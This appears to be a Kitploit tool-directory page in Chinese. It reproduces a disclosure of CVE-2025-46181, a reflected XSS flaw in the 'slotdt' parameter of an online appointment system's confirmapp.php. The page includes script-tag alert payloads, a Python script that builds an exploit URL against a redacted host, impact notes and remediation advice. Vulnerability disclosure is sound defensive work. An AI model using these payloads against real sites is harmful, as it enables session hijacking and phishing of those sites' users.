Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-46181-XSS — 反射型 XSS 漏洞披露,包含针对在线预约系统的 PoC 脚本与修复指南。涵盖易受攻击参数分析与影响评估。 | Kitploit
工具/GitHubGitHub/shemkumar/cve-2025-46181-xss
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

反射型 XSS 漏洞披露,包含针对在线预约系统的 PoC 脚本与修复指南。涵盖易受攻击参数分析与影响评估。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-46181 - 在线预约挂号系统中的反射型 XSS 漏洞

CVE-ID:CVE-2025-46181
发现者:Shemkumar P(shemkumar.github.io)
漏洞类型:反射型跨站脚本(XSS)
严重性:中危
状态:已披露,MITRE 已分配 CVE


✨ 描述

某公开在线预约挂号系统(v1.0)中存在**反射型跨站脚本(XSS)**漏洞,具体位于处理预约确认的页面。由于一个 GET 参数未能正确过滤输入,攻击者可在受害者的浏览器中注入并执行 JavaScript 代码。


📍 漏洞参数

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

示例载荷(编码后):

root@kitploit:~
<script>alert("XSS")</script>

💥 概念验证(PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 出于道德原因,真实链接已隐去。 该漏洞已在受控环境中完成测试。


⚙️ Python PoC 脚本

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ 影响

  • 任意 JavaScript 代码执行
  • 潜在的会话劫持
  • 点击劫持或钓鱼重定向
  • 通过构造链接发起的定向攻击

🧪 修复建议

应用程序应:

  • 在 PHP 中使用 htmlspecialchars() 对用户输入进行转义
  • 使用内容安全策略(CSP)
  • 在客户端和服务器端同时对用户数据进行清洗

📜 时间线

  • 发现时间:2025 年 5 月
  • MITRE 分配 CVE:2025 年 6 月
  • 公开披露:2025 年 6 月

🧑‍💻 作者

Shemkumar P
🕸️ shemkumar.github.io
🔐 网络安全研究员 | CTF 爱好者 | CVE 报告者


⚠️ 本文档仅供教育和防御用途。在未拥有或未经明确授权的系统上测试或利用漏洞属于非法且不道德的行为。

下载工具